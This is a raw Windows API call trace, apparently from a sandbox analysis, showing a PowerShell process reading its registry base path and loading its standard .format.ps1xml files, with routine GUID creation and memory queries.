	[0775.457] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0775.457] SetErrorMode (uMode=0x1) returned 0x1
	[0775.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.458] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0775.458] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0775.458] CoTaskMemAlloc (cb=0x5a) returned 0x47f160
	[0775.458] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47f160, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0775.458] CoTaskMemFree (pv=0x47f160) 
	[0775.458] RegCloseKey (hKey=0x314) returned 0x0
	[0775.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0777.111] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xed54b6fe, Data2=0x3e51, Data3=0x4049, Data4=([0]=0xb3, [1]=0xf4, [2]=0x2, [3]=0xd3, [4]=0xe3, [5]=0x2f, [6]=0x95, [7]=0x7c))) returned 0x0
	[0777.127] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x78be0b26, Data2=0xf757, Data3=0x4cf9, Data4=([0]=0xaa, [1]=0x93, [2]=0xa9, [3]=0xf, [4]=0x5b, [5]=0x7a, [6]=0x81, [7]=0xe9))) returned 0x0
	[0777.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0777.130] SetErrorMode (uMode=0x1) returned 0x1
	[0777.130] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0777.130] GetFileType (hFile=0x314) returned 0x1
	[0777.131] SetErrorMode (uMode=0x1) returned 0x1
	[0777.131] GetFileType (hFile=0x314) returned 0x1
	[0777.131] ReadFile (in: hFile=0x314, lpBuffer=0x33e5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5ed8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0777.132] ReadFile (in: hFile=0x314, lpBuffer=0x33e5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5ed8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.481] ReadFile (in: hFile=0x314, lpBuffer=0x33e5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5ed8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.482] ReadFile (in: hFile=0x314, lpBuffer=0x33e5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5ed8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.482] ReadFile (in: hFile=0x314, lpBuffer=0x33e5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5ed8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.491] ReadFile (in: hFile=0x314, lpBuffer=0x3259b98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3259b98*, lpNumberOfBytesRead=0x1ecd38*=0xfb2, lpOverlapped=0x0) returned 1
	[0778.491] ReadFile (in: hFile=0x314, lpBuffer=0x32592f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32592f2*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0778.491] ReadFile (in: hFile=0x314, lpBuffer=0x3259b98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3259b98*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0778.491] CloseHandle (hObject=0x314) returned 1
	[0778.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0778.491] SetErrorMode (uMode=0x1) returned 0x1
	[0778.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0778.492] SetErrorMode (uMode=0x1) returned 0x1
	[0778.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0778.492] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0778.492] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0778.492] CoTaskMemAlloc (cb=0x5a) returned 0x47e750
	[0778.492] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47e750, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0778.492] CoTaskMemFree (pv=0x47e750) 
	[0778.492] RegCloseKey (hKey=0x314) returned 0x0
	[0778.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0778.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0778.493] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc787ac65, Data2=0xffc, Data3=0x4ae6, Data4=([0]=0x80, [1]=0xa, [2]=0x36, [3]=0xd3, [4]=0x4a, [5]=0x43, [6]=0x2b, [7]=0x20))) returned 0x0
	[0778.498] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xff9c14c0, Data2=0x35bb, Data3=0x4a51, Data4=([0]=0x8f, [1]=0x35, [2]=0xc8, [3]=0x22, [4]=0x36, [5]=0x3, [6]=0xc8, [7]=0xd6))) returned 0x0
	[0778.500] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfc5a5a49, Data2=0xf226, Data3=0x4c3c, Data4=([0]=0x84, [1]=0x2f, [2]=0xc0, [3]=0x5c, [4]=0x98, [5]=0x21, [6]=0xba, [7]=0x91))) returned 0x0
	[0778.500] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x9d433ea4, Data2=0x8d1c, Data3=0x4025, Data4=([0]=0x8a, [1]=0xd3, [2]=0x8d, [3]=0x83, [4]=0xf6, [5]=0xa6, [6]=0x76, [7]=0x89))) returned 0x0
	[0778.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x8e4150e7, Data2=0xe465, Data3=0x4ada, Data4=([0]=0x8d, [1]=0xab, [2]=0x91, [3]=0xdf, [4]=0x1f, [5]=0x6e, [6]=0x17, [7]=0xaa))) returned 0x0
	[0778.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xb896b57b, Data2=0x395d, Data3=0x462b, Data4=([0]=0x9e, [1]=0x97, [2]=0x9b, [3]=0x8d, [4]=0x1b, [5]=0x0, [6]=0xcd, [7]=0x2d))) returned 0x0
	[0778.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0778.502] SetErrorMode (uMode=0x1) returned 0x1
	[0778.503] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0778.503] GetFileType (hFile=0x314) returned 0x1
	[0778.503] SetErrorMode (uMode=0x1) returned 0x1
	[0778.503] GetFileType (hFile=0x314) returned 0x1
	[0778.503] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.504] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.504] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.504] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.504] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.505] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0778.505] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0xaca, lpOverlapped=0x0) returned 1
	[0778.505] ReadFile (in: hFile=0x314, lpBuffer=0x329db6a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329db6a*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0778.505] ReadFile (in: hFile=0x314, lpBuffer=0x329e538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329e538*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0778.505] CloseHandle (hObject=0x314) returned 1
	[0778.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0778.506] SetErrorMode (uMode=0x1) returned 0x1
	[0778.506] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0778.506] SetErrorMode (uMode=0x1) returned 0x1
	[0778.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0778.506] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0778.506] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0778.506] CoTaskMemAlloc (cb=0x5a) returned 0x47e750
	[0778.506] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47e750, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0778.506] CoTaskMemFree (pv=0x47e750) 
	[0778.507] RegCloseKey (hKey=0x314) returned 0x0
	[0778.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0778.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0778.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0778.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0779.444] VirtualQuery (in: lpAddress=0x1eb860, lpBuffer=0x1ec720, dwLength=0x30 | out: lpBuffer=0x1ec720*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0779.445] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x578f7a6c, Data2=0x65b2, Data3=0x44a7, Data4=([0]=0xb4, [1]=0xe6, [2]=0x38, [3]=0x42, [4]=0x45, [5]=0x1c, [6]=0x6e, [7]=0x4e))) returned 0x0
	[0779.446] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x69113b4f, Data2=0xcf48, Data3=0x4ed0, Data4=([0]=0x84, [1]=0xe9, [2]=0x45, [3]=0x5e, [4]=0xe4, [5]=0x55, [6]=0xd, [7]=0x92))) returned 0x0
	[0779.447] VirtualQuery (in: lpAddress=0x1eba10, lpBuffer=0x1ec8d0, dwLength=0x30 | out: lpBuffer=0x1ec8d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0779.448] VirtualQuery (in: lpAddress=0x1eba10, lpBuffer=0x1ec8d0, dwLength=0x30 | out: lpBuffer=0x1ec8d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0779.449] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xe317974f, Data2=0xe13e, Data3=0x478d, Data4=([0]=0x86, [1]=0x8b, [2]=0x1f, [3]=0x8f, [4]=0x86, [5]=0x16, [6]=0xe3, [7]=0x17))) returned 0x0
	[0779.452] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xe3bf8ced, Data2=0x17c9, Data3=0x41f2, Data4=([0]=0x8e, [1]=0xe9, [2]=0xc1, [3]=0xd1, [4]=0x6b, [5]=0xe4, [6]=0xef, [7]=0x54))) returned 0x0
	[0779.452] VirtualQuery (in: lpAddress=0x1ebc60, lpBuffer=0x1ecb20, dwLength=0x30 | out: lpBuffer=0x1ecb20*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0779.453] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xa7a7bc7a, Data2=0x93cf, Data3=0x4f0d, Data4=([0]=0xa5, [1]=0x8a, [2]=0xd1, [3]=0xf9, [4]=0x73, [5]=0x7a, [6]=0x33, [7]=0xf6))) returned 0x0
	[0779.454] VirtualQuery (in: lpAddress=0x1eb2d0, lpBuffer=0x1ec190, dwLength=0x30 | out: lpBuffer=0x1ec190*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0779.454] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x1b9400c9, Data2=0x4fad, Data3=0x4169, Data4=([0]=0xaf, [1]=0xc2, [2]=0xdf, [3]=0x70, [4]=0x3, [5]=0x64, [6]=0x7e, [7]=0xcb))) returned 0x0
	[0779.454] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf3764cc, Data2=0x7dd5, Data3=0x4667, Data4=([0]=0xb9, [1]=0x48, [2]=0xd5, [3]=0xa3, [4]=0x58, [5]=0x12, [6]=0x49, [7]=0x60))) returned 0x0
	[0779.454] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0779.455] GetFileType (hFile=0x314) returned 0x1
	[0779.455] SetErrorMode (uMode=0x1) returned 0x1
	[0779.455] GetFileType (hFile=0x314) returned 0x1
	[0779.455] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.456] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.456] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.456] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.456] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.456] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0779.457] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.991] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.992] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.993] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.993] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.993] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.994] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.994] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.994] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0782.995] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
